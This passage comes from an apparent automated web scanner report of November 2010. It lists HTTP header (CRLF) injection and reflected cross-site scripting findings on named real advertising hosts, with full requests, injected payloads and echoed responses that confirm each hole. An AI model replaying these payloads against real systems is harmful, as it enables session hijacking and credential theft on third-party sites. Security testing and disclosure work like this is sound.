P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://111.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 463f8%0d%0a528a1642c1b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml&463f8%0d%0a528a1642c1b=1 HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:47 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4df582d6-538d-b488-33fe-0000429ab8cd; expires=Sat, 12-Feb-2011 23:04:47 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml&463f8
528a1642c1b
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.3. http://111.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload e669a%0d%0ae28ea9c05d9 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2Fe669a%0d%0ae28ea9c05d9&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:38 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=57f27a3d-d285-68a8-5328-0000395dd34d; expires=Sat, 12-Feb-2011 23:04:38 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/e669a
e28ea9c05d9
?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.4. http://111.xg4ken.com/media/redir.php [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_campaign request parameter is copied into the Location response header. The payload 30b1f%0d%0aecfcd25a03f was submitted in the utm_campaign parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=30b1f%0d%0aecfcd25a03f&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:32 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4c8b74bb-3954-8fa8-8326-0000577eace0; expires=Sat, 12-Feb-2011 23:04:32 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=30b1f
ecfcd25a03f
&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.5. http://111.xg4ken.com/media/redir.php [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_medium request parameter is copied into the Location response header. The payload 82be3%0d%0ab09c9f27eec was submitted in the utm_medium parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=82be3%0d%0ab09c9f27eec&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=3cef34ad-6303-35a8-1b8f-00003fd62bad; expires=Sat, 12-Feb-2011 23:04:18 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=82be3
b09c9f27eec
&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.6. http://111.xg4ken.com/media/redir.php [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_source request parameter is copied into the Location response header. The payload a9f0f%0d%0a3b6a61bb32f was submitted in the utm_source parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=a9f0f%0d%0a3b6a61bb32f&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:11 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=6676e6cc-44e7-2308-1a57-00001c552986; expires=Sat, 12-Feb-2011 23:04:11 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=a9f0f
3b6a61bb32f
&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.7. http://111.xg4ken.com/media/redir.php [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_term request parameter is copied into the Location response header. The payload ca84c%0d%0aa3b87022440 was submitted in the utm_term parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=ca84c%0d%0aa3b87022440&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:26 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=45f848c0-6f73-7f49-52f3-00006d9772ca; expires=Sat, 12-Feb-2011 23:04:26 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=ca84c
a3b87022440
&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.8. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /ibar/v12-002/c1/jsc/fcn1.js

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 1fb20%0d%0a9ce365740 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /ibar/v12-002/c1/jsc/fcn1.js?n=162&c=1fb20%0d%0a9ce365740&s=372&d=21&w=1&x=29&h=1&t=http://c7.zedo.com/OzoDB/headers/162/intercept_int268_common.js&r=24&z=0.9249365942940089 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/bay-area-living
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: c7.zedo.com
Proxy-Connection: Keep-Alive
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365

Response

HTTP/1.1 400 Bad Request
Server: ZEDO 3G
Content-Length: 147
Content-Type: text/html
Set-Cookie: ZHO162,1fb20
9ce365740
,21=1;expires=Tue, 16 Nov 2010 01: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "a1a6d5-f92-48e2846698880"
Vary: Accept-Encoding
X-Varnish: 408653166
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4168
Date: Mon, 15 Nov 2010 01:00:06 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (400 Bad Request) has occured in response to this request.
</BODY>
</HTML>

3. Cross-site scripting (reflected)  previous  next
There are 368 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191d2'-alert(1)-'5261f476c6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang191d2'-alert(1)-'5261f476c6f/news_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Date: Sun, 14 Nov 2010 23:04:20 GMT
Connection: close
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang191d2'-alert(1)-'5261f476c6f/news_fr;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.2. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81a3'-alert(1)-'13182692657 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang/news_frd81a3'-alert(1)-'13182692657 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Date: Sun, 14 Nov 2010 23:04:21 GMT
Connection: close
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:21 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang/news_frd81a3'-alert(1)-'13182692657;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0643'-alert(1)-'6bd51d1d378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang/news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGxvNHM5MyhnaWQkM2Y3Y2RmMmMtZjA0My0xMWRmLTk0ZDUtOTdiNjFiNzc1YTQ2LHN0JDEyODk3NzU3NDYzMDE5NDcsc2kkMjExMDUxLHYkMS4wLGFpZCRXQ09ocjBTMHFVay0sY3QkMjUseWJ4JEt6bjRYT0ZhYnlubGVUWlJwT1hBYkEsciQwKSk/1/*;ord=1289775746.342466?&f0643'-alert(1)-'6bd51d1d378=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: a.collective-media.net
Proxy-Connection: Keep-Alive
Cookie: JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; cli=11c4bc59fd87e17; dc=dal; bkdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Date: Sun, 14 Nov 2010 23:03:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:13 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466?&f0643'-alert(1)-'6bd51d1d378=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/q1.mng_bang/news_fr [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f00'-alert(1)-'fd033e733cd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang/news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGxvNHM5MyhnaWQkM2Y3Y2RmMmMtZjA0My0xMWRmLTk0ZDUtOTdiNjFiNzc1YTQ2LHN0JDEyODk3NzU3NDYzMDE5NDcsc2kkMjExMDUxLHYkMS4wLGFpZCRXQ09ocjBTMHFVay0sY3QkMjUseWJ4JEt6bjRYT0ZhYnlubGVUWlJwT1hBYkEsciQwKSk/1/*;ord=1289775746.342466?d8f00'-alert(1)-'fd033e733cd HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: a.collective-media.net
Proxy-Connection: Keep-Alive
Cookie: JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; cli=11c4bc59fd87e17; dc=dal; bkdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Sun, 14 Nov 2010 23:03:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:08 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466?d8f00'-alert(1)-'fd033e733cd;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 137a4'-alert(1)-'161cf7d1c7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7210
Date: Sun, 14 Nov 2010 23:04:31 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-25684700_1289775871","http://ad.doubleclick.net/adj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;net=q1;u=,q1-25684700_1289775871,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;cmw=nurl;sz=728x90;net=q1;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h;ord=1
...[SNIP]...

3.6. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e53d'-alert(1)-'e6ce7147582 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7156
Date: Sun, 14 Nov 2010 23:04:23 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19828667_1289775863","http://ad.doubleclick.net//q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr;net=q1;u=,q1-19828667_1289775863,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.7. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80db'-alert(1)-'232fd6d5621 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7156
Date: Sun, 14 Nov 2010 23:04:24 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
